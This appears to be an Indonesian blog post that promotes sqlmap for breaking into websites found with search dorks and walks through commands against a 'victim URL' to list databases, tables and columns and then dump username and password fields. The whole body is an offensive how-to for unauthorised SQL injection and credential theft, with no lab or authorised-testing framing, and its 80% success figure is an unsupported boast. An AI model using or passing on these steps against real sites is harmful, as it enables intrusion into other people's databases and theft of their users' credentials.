apa yang membuat saya senang dengan Sql Map? Sql Map ini ketika kita memasukan url website yang ingin kita bobol ia akan mencoba semaksimal mungkin dan dengan segala cara. ini bisa di bilang 80 % dari hasil scaner exploint bisa di bobol disini, beda dengan tool yang lain hanya rata rata 40-60% saja (INI SEMUA TERGANTUNG DORK) .
Tetapi semua tools memiliki kekurangan begitu pula SqlMap ini, Sqlmap hnya bisa menjalan kan 1 x proses saja , misal nya ketika kita sedang membuka table user, secara bersamaan kita tidak dapat membuka tabel admin, kita harus membuka nya satu satu, atau bisa dengan beda terminal pokok nya 1 proses 1 table atau 1 colom dah gitu
Untuk downlad sqlmap di windows bisa disini , karena sqlmap di windows mengunakan bahsa python kalian bisa download python disini a
- Buka terminal Linux dan ketikan sqlmap -u url korban --dbs
- Maka Akan Muncul list database yang ada di web tersebut
- Kemudian ketikan lagi sqlmap -u url korban -D dbkorban --tables
- Maka akan muncul lagi daftar table yang ada di database tersebut
- nah disini kita pilih table mna yang ingin kita buka contoh users, ketikan perintahsqlmap -u url korban -D dbkorban -T users --columns , maka akan muncul daftar colom yang ada di table itu
- Lalu pilih data mana yang mau kita dump atau kita ambil sqlmap -u url korban -D dbkorban -T users -C userName,userPass --dumps
Nah begitu lah cara nya selebih nya explorasi sendiri kalau mau bertanya bisa di coment saja
untuk lebih jelas bisa lihat video di bawah
0 komentar:
Posting Komentar